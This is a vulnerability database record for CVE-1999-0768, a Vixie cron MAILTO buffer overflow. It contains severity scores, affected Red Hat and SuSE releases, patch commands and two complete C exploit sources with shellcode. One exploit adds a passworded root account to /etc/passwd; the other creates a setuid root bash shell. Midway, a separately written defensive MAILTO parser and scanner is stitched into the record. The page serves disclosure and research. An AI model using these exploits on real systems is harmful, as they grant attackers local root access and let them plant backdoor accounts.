CVE-1999-0768
CVSS 7.5
Published: 1999-08-25 00:00:00
Revised: 2008-09-09 08:35:21

[Original] Buffer overflow in Vixie Cron on Red Hat systems via the MAILTO environmental variable.


[CNNVD] Vixie Cron buffer overflow vulnerability (CNNVD-199908-050)

        Vixie Cron on Red Hat-based systems contains a buffer overflow vulnerability, which can be triggered via the MAILTO environment variable.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:redhat:linux:6.0::i386
cpe:/o:redhat:linux:4.2 (Red Hat Linux 4.2)
cpe:/o:suse:suse_linux:6.0 (SuSE Linux 6.0)
cpe:/o:redhat:linux:5.2::i386
cpe:/o:suse:suse_linux:6.1 (SuSE Linux 6.1)

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0768
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0768
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-050
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/602
(UNKNOWN)  BID  602

- Vulnerability information

Vixie Cron buffer overflow vulnerability
High severity  Buffer overflow
1999-08-25 00:00:00 2005-05-02 00:00:00
Local
        Vixie Cron on Red Hat-based systems contains a buffer overflow vulnerability, which can be triggered via the MAILTO environment variable.

- Advisories and patches

        Red Hat Linux 4.2:
        Intel:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/i386/vixie-cron-3.0.1-36.4.2.i386.rpm
        Alpha:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/alpha/vixie-cron-3.0.1-36.4.2.alpha.rpm
        Sparc:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/sparc/vixie-cron-3.0.1-36.4.2.sparc.rpm
        Source packages:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/vixie-cron-3.0.1-36.4.2.src.rpm
        Red Hat Linux 5.2:
        Intel:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/i386/vixie-cron-3.0.1-36.5.2.i386.rpm
        Alpha:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/alpha/vixie-cron-3.0.1-36.5.2.alpha.rpm
        Sparc:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/sparc/vixie-cron-3.0.1-36.5.2.sparc.rpm
        Source packages:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/vixie-cron-3.0.1-36.5.2.src.rpm
        Red Hat Linux 6.0:
        Intel:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/i386/vixie-cron-3.0.1-37.i386.rpm
        Alpha:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/alpha/vixie-cron-3.0.1-37.alpha.rpm
        Sparc:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/sparc/vixie-cron-3.0.1-37.sparc.rpm
        Source packages:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/vixie-cron-3.0.1-37.src.rpm
        For each RPM for your particular architecture, run:
        rpm -Uvh <filename>
        where <filename> is the name of the RPM.

- Vulnerability information (19469)

RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (1) (EDBID:19469)
linux local
1999-08-30 Verified
0 Akke
N/A
source: http://www.securityfocus.com/bid/602/info

The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflowed in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack.

/*
	vixie-crontab-3.0.1 cron_popen() exploit by Akke - 30-8-99
			Akke <c4c4@hehe.com>
	

	how to compile ?
		gcc crontab_exploit.c -o crontab_exploit

	how to use ?
		./crontab_exploit
		crontab ./CrOn
		wait 1 minute
		crontab -r
		su -l cronexpl (password = exploited) (this is root account)
		
	Greets to: bugtraq
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/tmp/ce";

#define max_buf_len 1000
#define CronFile         "CrOn"
#define RootScript       "/tmp/cron_root"
#define CronEchoScript   "/tmp/cron_echo"
#define chmod_bin        "/bin/chmod"

int main()
{
	char crontab_file_string[max_buf_len];
	char temp[max_buf_len];
	FILE *fp;
	int i;

	strcpy(temp, 
	"T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
	"T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
	"_ _ _ _ _ _ _ _ _ _ _ _ _ _ ");
	/* strcat instead of sprintf(temp, "%s%s", temp, ...): passing the
	   destination as its own source is undefined behaviour in C */
	strcat(temp, shellcode);
	sprintf(crontab_file_string,"MAILTO=%s\n",temp);
	strcat(crontab_file_string,"0");
	for (i=1;i<60;i++) { sprintf(temp,",%d",i); strcat(crontab_file_string,temp); }
	sprintf(temp," * * * * %s\n",CronEchoScript);
	strcat(crontab_file_string,temp);

	if ((fp = fopen(CronFile,"w+")) != NULL) {
		fprintf(fp,"%s",crontab_file_string);
		fclose(fp);	
	}
	
	if ((fp = fopen(CronEchoScript,"w+")) != NULL) {
		fprintf(fp,"#!/bin/sh\necho Wrong window!");
		fclose(fp);
		sprintf(temp,"%s 777 %s",chmod_bin,CronEchoScript);
		system(temp);
	}
	
	if ((fp = fopen(RootScript,"w+")) != NULL) {
		#define login "cronexpl"
		#define passw "1T8uqGnJZ0OsQ" /* "exploited" */
		fprintf(fp,"#!/bin/sh\necho %s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s %s",login,passw,CronEchoScript,"/tmp/ce",RootScript);
		fclose(fp);
		sprintf(temp,"%s 777 %s",chmod_bin,RootScript);
		system(temp);
	}

	if ((fp = fopen("/tmp/ce","w+")) != NULL) {
		fprintf(fp,"#!/bin/sh\n%s\n",RootScript);
		fclose(fp);
		sprintf(temp,"%s 777 %s",chmod_bin,"/tmp/ce");
		system(temp);
	}
	exit(0);
}
		

- Vulnerability information (19470)

RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2) (EDBID:19470)
linux local
1999-08-25 Verified
0 jbowie
N/A
source: http://www.securityfocus.com/bid/602/info
 
The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflowed in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack.

/*
 * VixieCron 3.0 Proof of Concept Exploit - w00w00
 * 
 * Not only does Paul give up root with this one, but with his creative use of
 * strtok() he actually ends up putting the address of our shellcode in eip.  
 * 
 * Many Thanks: Cheez Wiz, Sangfroid
 * Thanks: stran9er, Shok
 * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
 * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \
 *        defacement group here>
 *        
 * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
 * 
 * -jbowie@el8.org
 * 
 */
   
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>

char shellcode[] =
        "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
        "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
        "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
        "\xff/tmp/w00w00";
        
int     
main(int argc,char *argv[])
{
        FILE *cfile,*tmpfile;
        struct stat sbuf;
        struct passwd *pw;
        int x;
        
        pw = getpwuid(getuid());
        
        chdir(pw->pw_dir);
        cfile = fopen("./cronny","a+");
        tmpfile = fopen("/tmp/w00w00","a+");
        
        fprintf(cfile,"MAILTO=");
        for(x=0;x<96;x++)
                fprintf(cfile,"w00w00 ");
        fprintf(cfile,"%s",shellcode);
        fprintf(cfile,"\n* * * * * date\n");
        fflush(cfile);

        fprintf(tmpfile,"#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n", pw->pw_dir,pw->pw_dir);
        fflush(tmpfile);
          
        fclose(cfile),fclose(tmpfile);
   
        chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);
   
        if(!(fork())) {
                execl("/usr/bin/crontab","crontab","./cronny",(char *)0);
        } else {  
                printf("Waiting for shell be patient....\n");
                for(;;) {
                        if(!(stat("./bash",&sbuf))) {
                                        break;
                        } else { sleep(5); }
                } 
                if((fork())) {
                        printf("Thank you for using w00warez!\n");
                        execl("./bash","bash",(char *)0);
                } else {  
                        remove("/tmp/w00w00");
                        sleep(5);
                        remove("./bash");
                        remove("./cronny");
                        execl("/usr/bin/crontab","crontab","-r",(char *)0);
                }
        }
        return 0;
}
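The two exploit records above describe the same defect: a MAILTO value copied from a crontab into a fixed-size buffer in cron_popen() without a length check. The following C code is an added, defender-side example and is not part of this record, of either exploit, or of Vixie cron's source. It shows a bounded parser for crontab MAILTO= lines that refuses values which would not fit its destination, and a scanner that counts MAILTO entries longer than a chosen limit, so that crontab files from the cron spool can be checked for entries of this shape. The names parse_mailto_bounded, parse_mailto_check, count_oversized_mailto and demo_scan, the MAILTO_LIMIT value and the sample crontab text are all constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed upper bound for a MAILTO value; Vixie cron's real buffer
 * size is not given on this page, so this number is an illustration. */
#define MAILTO_LIMIT 128

/* Extract the value of a crontab "MAILTO=..." line into dst, refusing
 * anything that does not fit. Returns the value length on success,
 * -1 if the line is not a MAILTO assignment, -2 if the value would
 * overflow dst. The -2 path is what an unbounded copy into a fixed
 * buffer (the pattern behind overflows of this class) lacks. */
int parse_mailto_bounded(const char *line, char *dst, size_t dstlen)
{
    const char *p = line;
    size_t n;

    while (*p == ' ' || *p == '\t') p++;
    if (strncmp(p, "MAILTO", 6) != 0) return -1;
    p += 6;
    while (*p == ' ' || *p == '\t') p++;
    if (*p != '=') return -1;
    p++;
    while (*p == ' ' || *p == '\t') p++;

    n = strcspn(p, "\r\n");          /* value runs to end of line */
    if (dstlen == 0 || n >= dstlen)  /* leave room for the NUL */
        return -2;
    memcpy(dst, p, n);
    dst[n] = '\0';
    return (int)n;
}

/* Wrapper for checks: parse into a scratch buffer of dstlen bytes
 * (capped at 256) and return the parser's result code. */
int parse_mailto_check(const char *line, size_t dstlen)
{
    char dst[256];
    if (dstlen > sizeof dst) dstlen = sizeof dst;
    return parse_mailto_bounded(line, dst, dstlen);
}

/* Walk a crontab text line by line and count MAILTO assignments whose
 * value is longer than `limit` bytes. A line longer than the scratch
 * buffer is truncated before parsing, which still flags it when it is
 * a MAILTO line, since the truncated value is far above any sane limit. */
int count_oversized_mailto(const char *crontab, size_t limit)
{
    int bad = 0;
    const char *line = crontab;
    char buf[4096], value[4096];

    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        int r;

        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        r = parse_mailto_bounded(buf, value, sizeof value);
        if (r == -2 || (r >= 0 && (size_t)r > limit)) bad++;
        if (!nl) break;
        line = nl + 1;
    }
    return bad;
}

/* Build a constructed crontab with one ordinary MAILTO line and one
 * whose value is long_len bytes of 'A', then scan it at the given
 * limit. Returns the number of oversized entries found. */
int demo_scan(size_t long_len, size_t limit)
{
    static const char head[] =
        "# constructed sample crontab\n"
        "MAILTO=ops@example.org\n"
        "0 * * * * /usr/local/bin/backup.sh\n"
        "MAILTO=";
    static const char tail[] = "\n* * * * * /bin/true\n";
    char text[8192];
    size_t pos;

    if (long_len > 4000) long_len = 4000;
    memcpy(text, head, sizeof head - 1);
    pos = sizeof head - 1;
    memset(text + pos, 'A', long_len);
    pos += long_len;
    memcpy(text + pos, tail, sizeof tail);   /* copies the NUL too */
    return count_oversized_mailto(text, limit);
}

int main(void)
{
    printf("oversized MAILTO entries at limit %d: %d\n",
           MAILTO_LIMIT, demo_scan(300, MAILTO_LIMIT));
    return 0;
}
```

The scanner reads whole crontab text rather than environment variables because the value reaches cron from the crontab file; pointing count_oversized_mailto at each file's contents is how a defender would audit a spool, and any entry it flags deserves a look regardless of which cron version is installed.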
		

- Vulnerability information

1058
Vixie Cron MAILTO Environment Variable Overflow
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

1999-08-25 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.1 or higher for Debian Linux, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete
 

 
